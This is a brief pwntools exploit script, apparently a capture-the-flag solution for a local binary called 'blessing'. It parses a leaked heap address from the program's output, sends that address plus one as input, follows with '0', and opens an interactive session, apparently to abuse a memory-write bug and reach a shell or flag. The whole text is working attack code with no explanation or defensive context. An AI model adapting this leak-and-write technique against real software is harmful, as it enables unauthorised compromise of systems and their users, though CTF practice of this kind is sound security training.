#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./blessing", checksec=False)
r = process()

# funcs
s = lambda a: r.sendlineafter(b": ", a)

# leak
r.recvuntil(b"this: ")
malloced = int(r.recv(14), 16)
log.info("malloced: %#x", malloced)

# buf
r.recvuntil(b"song?")
s(str(malloced+1).encode())
s(b"0")

r.interactive()